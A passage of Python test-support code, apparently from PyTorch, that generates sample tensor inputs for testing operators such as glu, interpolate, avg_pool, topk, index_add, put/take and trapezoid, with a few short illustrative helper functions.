    for has_bias, (in_feat, out_feat), batch_shape in \
            itertools.product([True, False], features_options, batch_options):
        input_tensor = create_tensor(batch_shape + [in_feat])
        weight = create_tensor([out_feat, in_feat])
        if not has_bias:
            sample_inputs.append(SampleInput(input_tensor, args=(weight,)))
            continue

        bias = create_tensor([out_feat])
        sample_inputs.append(SampleInput(input_tensor, args=(weight, bias)))
    return sample_inputs

def sample_inputs_bilinear(self, device, dtype, requires_grad, **kwargs):
    features_options = [[3, 4, 5], [8, 8, 8]]
    batch_options: List[List[int]] = [
        [],  # no batch
        [0],
        [8],
        [2, 3],
    ]
    create_tensor = partial(make_tensor, device=device, dtype=dtype,
                            requires_grad=requires_grad, low=-2, high=2)

    sample_inputs = []
    for has_bias, (in_feat1, in_feat2, out_feat), batch_shape in \
            itertools.product([True, False], features_options, batch_options):
        input_tensor1 = create_tensor(batch_shape + [in_feat1])
        input_tensor2 = create_tensor(batch_shape + [in_feat2])
        weight = create_tensor([out_feat, in_feat1, in_feat2])
        if not has_bias:
            sample_inputs.append(SampleInput(input_tensor1, args=(input_tensor2, weight,)))
            continue
        bias = create_tensor([out_feat])
        sample_inputs.append(SampleInput(input_tensor1, args=(input_tensor2, weight, bias)))

    return sample_inputs
def sample_inputs_glu(self, device, dtype, requires_grad, **kwargs):
    features_options = [[2], [2, 4], [8, 8], [3, 6, 8], [1, 4, 6, 7]]
    batch_options: List[List[int]] = [
        [],  # no batch
        [0],
        [8],
        [2, 3],
    ]
    create_tensor = partial(make_tensor, device=device, dtype=dtype,
                            requires_grad=requires_grad, low=-2, high=2)

    sample_inputs = []
    for features, batch_shape in itertools.product(features_options, batch_options):
        ndim = len(features) + len(batch_shape)
        for dim in range(ndim):
            input_tensor = create_tensor(batch_shape + features)
            dim_size = input_tensor.size(dim)
            if dim_size > 0 and dim_size % 2 == 0:
                sample_inputs.append(SampleInput(input_tensor, args=(dim,)))

    return sample_inputs
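# Illustrative sketch (not part of the generated samples): why the generator above only keeps
# dims of even size. glu splits `dim` into halves a and b and returns a * sigmoid(b), so the
# chosen dim is halved in the output. `_demo_glu_halving` is a hypothetical helper.
def _demo_glu_halving():
    x = torch.randn(2, 4, 6)
    out = torch.nn.functional.glu(x, dim=2)
    return out.shape  # torch.Size([2, 4, 3]); dim=2 must have even size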
def sample_inputs_interpolate(mode, self, device, dtype, requires_grad, **kwargs):
    N, C = 2, 3
    D = 4
    S = 3
    L = 5

    align_corners_options: Tuple[Any, ...] = (None,)
    if mode in ('linear', 'bilinear', 'bicubic', 'trilinear'):
        align_corners_options = (True, False, None)
    ranks_for_mode = {
        'nearest': [1, 2, 3],
        'linear': [1],
        'bilinear': [2],
        'bicubic': [2],
        'trilinear': [3],
        'area': [1, 2, 3]
    }

    def shape(size, rank, with_batch_channel=True):
        if with_batch_channel:
            return tuple([N, C] + ([size] * rank))
        return tuple([size] * rank)

    make_arg = partial(make_tensor, device=device, dtype=dtype,
                       requires_grad=requires_grad, low=-1, high=1)

    sample_inputs = []
    for align_corners in align_corners_options:
        for rank in ranks_for_mode[mode]:
            sample_inputs.extend([
                SampleInput(make_arg(shape(D, rank)),
                            args=(shape(S, rank, False), None, mode, align_corners)),
                SampleInput(make_arg(shape(D, rank)),
                            args=(shape(L, rank, False), None, mode, align_corners)),
                SampleInput(make_arg(shape(D, rank)),
                            args=(None, 1.7, mode, align_corners)),
                SampleInput(make_arg(shape(D, rank)),
                            args=(None, 0.6, mode, align_corners)),
            ])

    return sample_inputs

def sample_inputs_upsample(mode, self, device, dtype, requires_grad, **kwargs):
    N, C = 2, 3
    D = 4
    S = 3
    L = 5

    ranks_for_mode = {
        'nearest': [1, 2, 3],
        'bilinear': [2],
    }

    def shape(size, rank, with_batch_channel=True):
        if with_batch_channel:
            return tuple([N, C] + ([size] * rank))
        return tuple([size] * rank)

    make_arg = partial(make_tensor, device=device, dtype=dtype,
                       requires_grad=requires_grad, low=-1, high=1)

    sample_inputs = []
    for rank in ranks_for_mode[mode]:
        sample_inputs.extend([
            SampleInput(make_arg(shape(D, rank)), kwargs=dict(size=shape(S, rank, False))),
            SampleInput(make_arg(shape(D, rank)), kwargs=dict(size=shape(L, rank, False))),
            SampleInput(make_arg(shape(D, rank)), kwargs=dict(scale_factor=1.7)),
            SampleInput(make_arg(shape(D, rank)), kwargs=dict(scale_factor=0.6)),
        ])

    return sample_inputs

def sample_inputs_gelu(self, device, dtype, requires_grad, **kwargs):
    N = 5
    tensors = []
    for _ in range(1, N):
        for approximate in ['none', 'tanh']:
            tensors.append(SampleInput(
                make_tensor((N * 2, N * 2), device=device, dtype=dtype,
                            requires_grad=requires_grad, low=-3, high=3),
                kwargs=dict(approximate=approximate)))
    return tensors

def sample_inputs_max_min_reduction_with_dim(op_info, device, dtype, requires_grad, **kwargs):
    inputs = []
    args_for_reduction_with_dim = (
        ((S, S, S), (1,),),
        ((S, S, S), (1, True, ),),
        ((), (0,),),
        ((), (0, True,),),
    )
    inputs = list((SampleInput(make_tensor(input_tensor, dtype=dtype, device=device,
                                           low=None, high=None,
                                           requires_grad=requires_grad),
                               args=args,))
                  for input_tensor, args in args_for_reduction_with_dim)
    return inputs

def sample_inputs_max_min_reduction_no_dim(op_info, device, dtype, requires_grad, **kwargs):
    inputs = []
    inputs.append(SampleInput(make_tensor((S, S, S), dtype=dtype, device=device,
                                          low=None, high=None,
                                          requires_grad=requires_grad),))
    inputs.append(SampleInput(make_tensor((), dtype=dtype, device=device,
                                          low=None, high=None,
                                          requires_grad=requires_grad),))
    return inputs

def _generate_nan_reduction_inputs(device, dtype, requires_grad, **kwargs):
    yield from _generate_reduction_inputs(device, dtype, requires_grad)
    yield torch.tensor([2, torch.nan, -1], device=device, dtype=dtype, requires_grad=requires_grad)
    yield torch.tensor([[torch.nan, 2], [0, 1]], device=device, dtype=dtype, requires_grad=requires_grad)

def sample_inputs_nan_reduction(supports_multiple_dims):
    # Generates sample inputs for reduction ops that contain the input tensor
    # and dim and keepdim kwargs. If a reduction op needs to test additional
    # args/kwargs then create a separate sample_inputs function
    def fn(op_info, device, dtype, requires_grad, **kwargs):
        inputs = []

        for t in _generate_nan_reduction_inputs(device, dtype, requires_grad):
            # Add case without dim and keepdim kwargs
            inputs.append(SampleInput(t.clone().requires_grad_(requires_grad)))
            for kwargs in _generate_reduction_kwargs(t.ndim, supports_multiple_dims):
                inputs.append(SampleInput(t.clone().requires_grad_(requires_grad),
                                          kwargs=kwargs))

        return inputs

    return fn

def sample_inputs_reduction_quantile(op_info, device, dtype, requires_grad, **kwargs):
    test_quantiles = (0.5, make_tensor((2,), dtype=dtype, device=device, low=0, high=1,
                                       requires_grad=requires_grad))
    test_interpolations = ['linear', 'midpoint']

    inputs = []
    for quantiles in test_quantiles:
        for t in _generate_reduction_inputs(device, dtype, requires_grad):
            # Add case without dim and keepdim kwargs
            inputs.append(SampleInput(t.clone().requires_grad_(requires_grad),
                                      args=(quantiles,)))
            for kwargs in _generate_reduction_kwargs(t.ndim, supports_multiple_dims=False):
                # Interpolation kwarg for now is only supported when providing both dim and keepdim
                kwargs.setdefault('dim', 0)
                kwargs.setdefault('keepdim', False)
                for interpolation in test_interpolations:
                    kwargs['interpolation'] = interpolation
                    inputs.append(SampleInput(t.clone().requires_grad_(requires_grad),
                                              args=(quantiles,), kwargs=kwargs))

    return inputs
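# Illustrative sketch (not part of the generated samples): the `interpolation` kwarg is only
# exercised together with explicit `dim`/`keepdim` above, matching torch.quantile's keyword-only
# signature. `_demo_quantile_interpolation` is a hypothetical helper.
def _demo_quantile_interpolation():
    t = torch.arange(4.)
    # 'midpoint' averages the two nearest data points instead of linearly interpolating
    return torch.quantile(t, 0.5, dim=0, keepdim=False, interpolation='midpoint')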
def sample_inputs_reduction_count_nonzero(*args, **kwargs):
    """Sample inputs for count_nonzero"""
    # count_nonzero does not support keepdim yet
    for sample in sample_inputs_reduction(*args, **kwargs):
        sample.kwargs.pop('keepdim', None)
        yield sample

def sample_inputs_leaky_relu(op_info, device, dtype, requires_grad, **kwargs):
    N = 10
    tensors = [SampleInput(make_tensor((N, N), device=device, dtype=dtype,
               requires_grad=requires_grad)) for _ in range(1, N)]
    return tensors

def sample_inputs_fractional_max_pool2d(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Order: input_shape, kernel_size
    cases = (((1, 3, 9, 9), 3),
             ((1, 3, 9, 9), (4, 4)),
             ((1, 3, 9, 9), (6, 6)),
             ((2, 3, 9, 9), (3, 3)),
             ((1, 1, 4, 4), (2, 2)),
             ((1, 2, 6, 6), (4, 4)))

    samples = []

    for input_shape, kernel_size in cases:
        for return_indices in [False, True]:
            # test case passing a single output size
            samples.append(SampleInput(
                make_arg(input_shape),
                args=(kernel_size,),
                kwargs=dict(output_size=(2), return_indices=return_indices)
            ))

            # test case passing a tuple output size
            samples.append(SampleInput(
                make_arg(input_shape),
                args=(kernel_size,),
                kwargs=dict(output_size=(2, 3), return_indices=return_indices)
            ))

            # test case passing an output ratio
            samples.append(SampleInput(
                make_arg(input_shape),
                args=(kernel_size,),
                kwargs=dict(output_ratio=(0.5, 0.5), return_indices=return_indices)
            ))

    return samples

def sample_inputs_fractional_max_pool3d(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Order: input_shape, kernel_size
    cases = (((2, 3, 5, 5, 5), (2, 2, 2)),
             ((1, 2, 6, 5, 4), 2),
             ((1, 2, 5, 6, 5), (2, 3, 2)),
             ((1, 2, 6, 6, 6), (2, 3, 2)),
             ((1, 1, 7, 6, 7), (2, 3, 4)),
             ((1, 1, 4, 5, 4), (2, 2, 1)),
             ((1, 1, 8, 7, 6), (4, 3, 2)),
             ((0, 1, 4, 5, 4), (2, 2, 1)))

    samples = []

    for input_shape, kernel_size in cases:
        for return_indices in [False, True]:
            # test case passing a single output size
            samples.append(SampleInput(
                make_arg(input_shape),
                args=(kernel_size,),
                kwargs=dict(output_size=(2), return_indices=return_indices)
            ))

            # test case passing a tuple output size
            samples.append(SampleInput(
                make_arg(input_shape),
                args=(kernel_size,),
                kwargs=dict(output_size=(2, 3, 2), return_indices=return_indices)
            ))

            # test case passing an output ratio
            samples.append(SampleInput(
                make_arg(input_shape),
                args=(kernel_size,),
                kwargs=dict(output_ratio=(0.5, 0.5, 0.5), return_indices=return_indices)
            ))

    return samples

def sample_inputs_avgpool2d(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Order: input_shape, kernel_size, stride, padding, ceil_mode, count_include_pad, divisor_override
    cases = (((1, 3, 9, 9), 3, 1, 1, True, False, 2),
             ((1, 3, 9, 9), (4, 4), (2, 3), 1, True, False, 2),
             ((1, 3, 9, 9), (6, 6), (3, 3), (2, 3), True, True, 2),
             ((2, 3, 9, 9), (3, 3), (1, 1), (1, ), True, False, 2),
             ((1, 1, 4, 4), (2, 2), (), (0, ), False, True, -2),
             ((1, 2, 6, 6), (4, 4), (2, 2), (2, ), True, True, None))

    for input_shape, kernel_size, stride, padding, ceil_mode, count_include_pad, divisor_override in cases:
        yield SampleInput(make_arg(input_shape),
                          args=(kernel_size, stride, padding, ceil_mode,
                                count_include_pad, divisor_override))
    # Case with just input_shape and kernel_size
    # (note the trailing comma: kernel_size must be passed as a single tuple argument)
    yield SampleInput(make_arg((1, 3, 9, 9)), args=((3, 3),))
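# Illustrative sketch (not part of the generated samples): the positional args tuples above
# follow F.avg_pool2d's parameter order. `_demo_avg_pool2d_arg_order` is a hypothetical helper.
def _demo_avg_pool2d_arg_order():
    x = torch.randn(1, 3, 9, 9)
    # (kernel_size, stride, padding, ceil_mode, count_include_pad, divisor_override)
    return torch.nn.functional.avg_pool2d(x, 3, 1, 1, True, False, 2)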
def sample_inputs_avgpool1d(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Order: input_shape, kernel_size, kwargs
    cases: List[Tuple[Tuple[int, ...], Union[int, Tuple[int, ...]], Dict]] = [
        ((2, 3, 9), (3,), dict()),
        ((1, 3, 9), 3, dict(stride=1, padding=1, ceil_mode=True, count_include_pad=False)),
        ((1, 3, 9), (6,), dict(stride=(3,), padding=(2,), ceil_mode=True, count_include_pad=True)),
        ((2, 3, 9), (3,), dict(stride=(1,), padding=(1,), ceil_mode=False, count_include_pad=True)),
        ((0, 3, 9), (6,), dict(stride=(3,), padding=(2,), ceil_mode=False, count_include_pad=True)),
        ((1, 2, 9), (7,), dict(stride=(3,), padding=(2,), ceil_mode=False)),
        ((1, 2, 9), (7,), dict(stride=(3,), padding=(3,), ceil_mode=True)),
        ((1, 2, 9), (7,), dict(stride=(3,), ceil_mode=False)),
        ((1, 2, 9), (7,), dict(stride=(3,), ceil_mode=True)),
    ]

    for input_shape, kernel_size, kwargs in cases:
        yield SampleInput(make_arg(input_shape), args=(kernel_size,), kwargs=kwargs)

def sample_inputs_avgpool3d(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    # Order: input_shape, kernel_size, stride, padding, ceil_mode, count_include_pad, divisor_override
    cases: List[Tuple[Tuple[int, ...], Union[int, Tuple[int, ...]], Dict]] = [
        ((2, 3, 3, 4, 4), (2, 2, 2), dict()),
        ((1, 2, 4, 4, 4), 2, dict(stride=1, padding=1, ceil_mode=True,
                                  count_include_pad=False, divisor_override=2)),
        ((1, 2, 5, 5, 5), (2, 3, 4), dict(stride=(1, 2, 2), padding=(0, 1, 2), ceil_mode=True,
                                          count_include_pad=True, divisor_override=2)),
        ((1, 2, 5, 5, 5), (2, 3, 4), dict(stride=(1, 2, 2), padding=(0, 1, 2), ceil_mode=False)),
        ((1, 1, 7, 5, 7), (6, 3, 4), dict(stride=(2, 3, 2), padding=(3, 1, 0), ceil_mode=False,
                                          count_include_pad=False, divisor_override=2)),
        ((1, 1, 4, 5, 4), (2, 2, 3), dict(stride=(2, 2, 1), padding=0, ceil_mode=False,
                                          count_include_pad=True, divisor_override=-2)),
        ((1, 1, 6, 5, 6), (4, 5, 6), dict(stride=(2, 3, 2), padding=2, ceil_mode=True,
                                          count_include_pad=True, divisor_override=None)),
        ((0, 1, 4, 5, 4), (2, 3, 1), dict(stride=(2, 1, 2), padding=0, ceil_mode=False,
                                          count_include_pad=True, divisor_override=None)),
    ]

    for input_shape, kernel_size, kwargs in cases:
        yield SampleInput(make_arg(input_shape), args=(kernel_size,), kwargs=kwargs)

def sample_inputs_topk(op_info, device, dtype, requires_grad, **kwargs):
    def get_tensor_input(size):
        return make_tensor(size, dtype=dtype, device=device, requires_grad=requires_grad)

    inputs = []
    inputs.append(SampleInput(get_tensor_input((S, M, S)), args=(3,)))
    inputs.append(SampleInput(get_tensor_input((S, M, S)), args=(3, 1)))
    inputs.append(SampleInput(get_tensor_input((S, M, S)), args=(3, -2)))
    inputs.append(SampleInput(get_tensor_input((S, M, S)), args=(3, 1, True)))
    inputs.append(SampleInput(get_tensor_input((S, M, S)), args=(3, -2, True)))
    inputs.append(SampleInput(get_tensor_input((S, M, S)), args=(3, 1, True, True)))
    inputs.append(SampleInput(get_tensor_input((S, M, S)), args=(3, -2, True, True)))

    inputs.append(SampleInput(get_tensor_input(()), args=(1,)))
    inputs.append(SampleInput(get_tensor_input(()), args=(1, 0)))
    inputs.append(SampleInput(get_tensor_input(()), args=(1, -1)))
    inputs.append(SampleInput(get_tensor_input(()), args=(1, 0, True)))
    inputs.append(SampleInput(get_tensor_input(()), args=(1, -1, True)))
    inputs.append(SampleInput(get_tensor_input(()), args=(1, 0, True, True)))
    inputs.append(SampleInput(get_tensor_input(()), args=(1, -1, True, True)))

    return inputs
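# Illustrative sketch (not part of the generated samples): the args tuples above unpack as
# (k, dim, largest, sorted) per torch.topk's signature. `_demo_topk_arg_order` is a
# hypothetical helper.
def _demo_topk_arg_order():
    t = torch.randn(5, 10, 5)
    values, indices = torch.topk(t, 3, 1, True, True)  # k=3 along dim=1, largest, sorted
    return values.shape  # torch.Size([5, 3, 5])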
def sample_inputs_outer(op_info, device, dtype, requires_grad, **kwargs):
    inputs = []
    arg_a = make_tensor((S,), dtype=dtype, device=device, requires_grad=requires_grad)
    arg_b = make_tensor((M,), dtype=dtype, device=device, requires_grad=requires_grad)
    inputs.append(SampleInput(arg_a, args=(arg_b,)))
    return inputs

def sample_inputs_dist(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)
    sizes = ((S, S, S), (S,), (S, 1, S), (), (S, S))
    ps = (2, 4)

    for size_x, size_y, p in product(sizes, sizes, ps):
        yield SampleInput(make_arg(size_x), args=(make_arg(size_y), p))

# Missing to test the nondeterminism of the operation
# https://github.com/pytorch/pytorch/issues/53352
def sample_inputs_index(op_info, device, dtype, requires_grad, **kwargs):
    # target.index_select(dim, idx)
    select = op_info.name == "index_select"
    # target.index_add(dim, idx, source, *, alpha=1)
    add = op_info.name == "index_add"
    # target.index_copy(dim, idx, source)
    copy = op_info.name == "index_copy"
    # target.index_fill(dim, idx, value)
    fill = op_info.name == "index_fill"

    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)
    make_permutation = partial(torch.randperm, device=device, dtype=torch.int64)

    def make_idx(n):
        return make_tensor((n,), device=device, dtype=torch.int64, low=0, high=n)

    shapes = [(), (1,), (S, S)]
    # extra parameter for add
    alphas = (-1, 0, 2) if add else (None,)

    for shape, alpha in product(shapes, alphas):
        t = make_arg(shape)
        args = []

        # dim. We handle the scalar case
        dim = 1 if t.ndim == 2 else 0
        args.append(dim)

        # idx. They need to be different for copy and add to be deterministic
        make_idx_fn = make_permutation if copy or add else make_idx
        idx = make_idx_fn(t.shape[dim] if t.ndim != 0 else 1)
        args.append(idx)

        # source
        if copy or add:
            args.append(make_arg(shape))
        elif fill:
            # A weird number to catch errors
            args.append(make_arg((1,)).item())

        args = tuple(args)
        kwargs = {} if alpha is None else {"alpha": alpha}

        yield SampleInput(t, args=args, kwargs=kwargs)
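# Illustrative sketch (not part of the generated samples): why the generator above draws the
# index from torch.randperm for index_copy/index_add — repeated indices would make the result
# order-dependent. `_demo_index_add_deterministic` is a hypothetical helper.
def _demo_index_add_deterministic():
    t = torch.zeros(5, 3)
    src = torch.ones(5, 3)
    idx = torch.randperm(5)  # a permutation: every destination row written exactly once
    return t.index_add(0, idx, src, alpha=2)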
def sample_inputs_index_reduce(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    def make_idx(n, m):
        return make_tensor((n,), device=device, dtype=torch.int64, low=0, high=m)

    shapes = [((), ()), ((1,), (1,)), ((S, S), (S, M)), ((S, S, S), (S, M, S))]
    include_selfs = (True, False)
    reduces = ('prod', 'mean', 'amin', 'amax')

    for shape, include_self, reduce in product(shapes, include_selfs, reduces):
        self_shape, src_shape = shape
        # dim. We handle the scalar case
        dim = 1 if len(self_shape) >= 2 else 0
        idx = make_idx(src_shape[dim] if len(src_shape) != 0 else 1,
                       self_shape[dim] if len(self_shape) != 0 else 1)
        args = (dim, idx, make_arg(src_shape), reduce)
        yield SampleInput(make_arg(self_shape),
                          args=args,
                          kwargs={'include_self' : include_self})

    # Sample inputs to test edge cases for backward
    if requires_grad:
        # Check that gradients are propagated correctly for prod when zeros in self/src are reduced
        # This sample tests gradients for the following cases
        # (a) 1 zero reduced (from source (self[0, 1]), from self (self[0, 0]))
        # (b) 2 zeros reduced (1 from src and 1 from self (self[1, 0], self[1, 1])
        # (c) no zeros reduced (self[2, 1], self[2, 2])
        # (d) 2 zeros reduced (both from src) is tested in test/test_autograd.py
        #     test_scatter_index_reduce_prod_gradgrad_error as this case is not supported for gradgrad
        input = torch.tensor([[0, 13], [0, 0], [15, 19]], dtype=dtype, device=device, requires_grad=requires_grad)
        src = torch.tensor([[2, 0], [0, 0], [2, 3], [2, 2]], dtype=dtype, device=device, requires_grad=requires_grad)
        idx = torch.tensor([0, 1, 2, 0], dtype=torch.long, device=device)

        yield SampleInput(input,
                          args=(0, idx, src, 'prod'),
                          kwargs={'include_self': True})

def sample_inputs_mode(op_info, device, dtype, requires_grad, **kwargs):
    inputs = []
    args = (
        ((S, S, S), (),),
        ((S, S, S), (1, ),),
        ((S, S, S), (1, True, ),),
        ((), (),),
        ((), (0,),),
        ((), (0, True,),),
    )
    inputs = list((SampleInput(make_tensor(input_tensor, dtype=dtype, device=device,
                                           low=None, high=None,
                                           requires_grad=requires_grad),
                               args=args,))
                  for input_tensor, args in args)
    return inputs

# Missing to test the nondeterminism of the operation
# https://github.com/pytorch/pytorch/issues/53352
def sample_inputs_put(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)
    make_idx = partial(make_tensor, low=0, dtype=torch.int64, device=device, requires_grad=False)

    S = 3

    # Generic inputs
    idx = torch.randperm(S * S, device=device, dtype=torch.int64)[:S]
    idx_list = [idx, -idx - 1]
    for idx, acc in product(idx_list, (True, False)):
        yield SampleInput(input=make_arg((S, S)),
                          args=(idx.clone(),
                                make_arg((S,)),
                                acc))

    # Scalar cases
    scalar_sizes = [(), (1,)]
    tgt_gen = (make_arg(size) for size in scalar_sizes)
    idx_gen = (make_idx(size, high=1) for size in scalar_sizes)
    src_gen = (make_arg(size) for size in scalar_sizes)
    for tgt, idx, src, acc in product(tgt_gen, idx_gen, src_gen, (True, False)):
        yield SampleInput(input=tgt.clone().requires_grad_(requires_grad),
                          args=(idx.clone(),
                                src.clone().requires_grad_(requires_grad),
                                acc))

    # Empty cases
    tgt_sizes = [(0,), (), (1,), (3, 2)]
    tgt_gen = (make_arg(size) for size in tgt_sizes)
    idx = make_idx((0,), high=1)
    src = make_arg((0,))
    # iterate over tgt_gen (the original iterated over the leftover `tgt` loop variable,
    # which skipped these freshly built targets)
    for tgt, acc in product(tgt_gen, (True, False)):
        yield SampleInput(input=tgt.clone().requires_grad_(requires_grad),
                          args=(idx.clone(),
                                src.clone().requires_grad_(requires_grad),
                                acc))

def sample_inputs_take(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)
    make_idx = partial(make_tensor, low=0, dtype=torch.int64, device=device, requires_grad=False)

    S = 3

    # Generic inputs: take S elements out of S * S
    index = make_idx((S,), high=(S * S))
    for idx in (index, -index - 1):
        yield SampleInput(input=make_arg((S, S)), args=(idx,))

    # Scalar cases
    scalar_sizes = [(), (1,)]
    src_gen = (make_arg(size) for size in scalar_sizes)
    idx_gen = (make_idx(size, high=1) for size in scalar_sizes)
    for src, idx in product(src_gen, idx_gen):
        yield SampleInput(input=src.clone().requires_grad_(requires_grad),
                          args=(idx.clone(),))

    # Empty cases
    src_sizes = [(0,), (), (1,), (3, 2)]
    src_gen = (make_arg(size) for size in src_sizes)
    idx = make_idx((0,), high=1)
    for src in src_gen:
        yield SampleInput(input=src.clone().requires_grad_(requires_grad),
                          args=(idx.clone(),))
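# Illustrative sketch (not part of the generated samples): take/put index into the *flattened*
# tensor, which is why the generators above draw indices from range(S * S) (negative values
# wrap around). `_demo_take_put_flat_indexing` is a hypothetical helper.
def _demo_take_put_flat_indexing():
    t = torch.tensor([[10, 20], [30, 40]])
    idx = torch.tensor([0, 3])
    taken = torch.take(t, idx)  # tensor([10, 40])
    t.put_(idx, torch.tensor([1, 2]), accumulate=True)  # adds into flat positions 0 and 3
    return taken, t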
def sample_movedim_moveaxis(op_info, device, dtype, requires_grad, **kwargs):
    return (
        SampleInput(
            make_tensor((4, 3, 2, 1), dtype=dtype, device=device,
                        low=None, high=None, requires_grad=requires_grad),
            args=([0, 1, 2, 3], [3, 2, 1, 0])),
        SampleInput(
            make_tensor((4, 3, 2, 1), dtype=dtype, device=device,
                        low=None, high=None, requires_grad=requires_grad),
            args=([0, -1, -2, -3], [-3, -2, -1, -0]))
    )

def sample_repeat_tile(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)
    rep_dims = ((), (0, ), (1, ), (0, 2), (1, 1), (2, 3), (2, 3, 2), (0, 2, 3), (2, 1, 1, 1),)
    shapes = ((), (0,), (2,), (3, 0), (3, 2), (3, 0, 1))

    if requires_grad:
        # Tests for variant_consistency_jit, grad, gradgrad
        # are slower. Use smaller bags of `rep_dims` and `shapes`
        # in this case.
        rep_dims = ((), (0, ), (0, 2), (1, 1), (2, 3), (1, 3, 2), (3, 1, 1))  # type: ignore[assignment]
        shapes = ((), (0,), (2,), (3, 2))  # type: ignore[assignment]

    samples = []
    for rep_dim, shape in product(rep_dims, shapes):
        # `torch.repeat` errors for `len(rep_dims) < t.dim()`,
        # so we filter such combinations.
        if op_info.name == 'repeat' and len(rep_dim) < len(shape):
            continue
        samples.append(SampleInput(make_arg(shape), args=(rep_dim,),))

    return samples

def sample_inputs_narrow(op_info, device, dtype, requires_grad, **kwargs):
    shapes_and_args = (
        ((S, S, S), (1, 2, 2)),
        ((S, S, S), (-1, 2, 2)),
        ((S, S, S), (1, 0, 0)),
        ((S, S, S), (-1, 0, 0)),
        ((S, S, S), (2, 1, 2)),
    )

    for shape, args in shapes_and_args:
        tensor = make_tensor(shape, dtype=dtype, device=device, low=None, high=None,
                             requires_grad=requires_grad)
        yield SampleInput(tensor, args=args)

def sample_trapezoid(op_info, device, dtype, requires_grad, **kwargs):
    y_shape_x_shape_and_kwargs = [
        ((2, 3), (2, 3), {}),
        ((2, 3), (2, 3), {'dim': 1}),
        ((6,), (6,), {}),
        ((6,), None, {}),
        # When 'trapezoid' is called with an empty input, it does not produce an output with requires_grad
        # See Issue #61619
        # ((6, 0), (6, 0), {}),
        ((2, 3), (1, 3), {}),
        ((3, 3), (3, 3), {}),
        ((3, 3), (3, 3), {'dim': -2}),
        ((5,), None, {'dx': 2.0}),
        ((2, 2), None, {'dx': 3.0})
    ]
    samples = []
    for y_shape, x_shape, kwarg in y_shape_x_shape_and_kwargs:
        y_tensor = make_tensor(y_shape, dtype=dtype, device=device, low=None, high=None,
                               requires_grad=requires_grad)
        if x_shape is not None:
            x_tensor = make_tensor(x_shape, dtype=dtype, device=device, low=None, high=None,
                                   requires_grad=requires_grad)
            samples.append(SampleInput(y_tensor, args=(x_tensor,), kwargs=kwarg))
        else:
            samples.append(SampleInput(y_tensor, kwargs=kwarg))
    return samples

def sample_cumulative_trapezoid(op_info, device, dtype, requires_grad, **kwargs):
    y_shape_x_shape_and_kwargs = [
        ((2, 3), (2, 3), {}),
        ((2, 3), (2, 3), {'dim': 1}),
        ((6,), (6,), {}),
        ((6,), None, {}),
        # When 'cumulative_trapezoid' is called with an empty input, it does not produce an output with requires_grad
        # See Issue #61619
        # ((6, 0), (6, 0), {}),
        ((2, 3), (1, 3), {}),
        ((3, 3), (3, 3), {}),
        ((3, 3), (3, 3), {'dim': -2}),
        ((5,), None, {'dx': 2.0}),
        ((2, 2), None, {'dx': 3.0})
    ]
    samples = []
    for y_shape, x_shape, kwarg in y_shape_x_shape_and_kwargs:
        y_tensor = make_tensor(y_shape, dtype=dtype, device=device, low=None, high=None,
                               requires_grad=requires_grad)
        if x_shape is not None:
            x_tensor = make_tensor(x_shape, dtype=dtype, device=device, low=None, high=None,
                                   requires_grad=requires_grad)
            samples.append(SampleInput(y_tensor, args=(x_tensor,), kwargs=kwarg))
        else:
            samples.append(SampleInput(y_tensor, kwargs=kwarg))
    return samples
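# Illustrative sketch (not part of the generated samples): the `dx` kwarg cases above assume
# uniformly spaced abscissae. For y = [1, 2, 3] and dx = 2 the trapezoidal rule gives
# ((1 + 2) / 2 + (2 + 3) / 2) * 2 == 8. `_demo_trapezoid_dx` is a hypothetical helper.
def _demo_trapezoid_dx():
    y = torch.tensor([1., 2., 3.])
    return torch.trapezoid(y, dx=2.0)  # tensor(8.)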
def sample_unsqueeze(op_info, device, dtype, requires_grad, **kwargs):
    shapes_and_axes = [
        ((3, 4, 5), 0),
        ((3, 4, 5), 1),
        ((3, 4, 5), 3),
        ((3, 4, 5), -1),
        ((3, 4, 5), -3),
        ((), 0),
        ((), -1),
        ((1,), 0),
        ((1,), -1),
    ]

    samples = []
    for shape, axis in shapes_and_axes:
        tensor = make_tensor(shape, dtype=dtype, device=device, low=None, high=None,
                             requires_grad=requires_grad)
        samples.append(SampleInput(tensor, args=(axis,),))

    return samples

def sample_inputs_nn_unfold(op_info, device, dtype, requires_grad, **kwargs):
    shapes = ((0, 1, 5, 5), (1, 1, 5, 5), (2, 3, 5, 5))
    kernel_sizes = (2, (2, 2), (3, 3))
    dilations = (1, 2, (1, 2))
    paddings = (0, 1, (1, 1))
    strides = (1, 2, (1, 2))

    cases = product(shapes, kernel_sizes, dilations, paddings, strides)
    for shape, kernel_size, dilation, padding, stride in cases:
        tensor = make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad)
        yield SampleInput(tensor, args=(kernel_size, dilation, padding, stride))

    # With default args
    yield SampleInput(make_tensor((1, 1, 5, 5), dtype=dtype, device=device, requires_grad=requires_grad),
                      args=((3, 3),))

def sample_inputs_squeeze(op_info, device, dtype, requires_grad, **kwargs):
    shapes_and_args = (
        ((S, 1, S, 1), ()),
        ((1, 1, 1, 1), ()),
        ((S, 1, S, 1), (1,)),
        ((S, 1, S, 1), (-1,)),
        ((S, 1, S, 1), (2,)),
        ((S, 1, S, 1), (-2,)),
        ((), (0, )),
    )

    for shape, args in shapes_and_args:
        tensor = make_tensor(shape, dtype=dtype, device=device, low=None, high=None,
                             requires_grad=requires_grad)
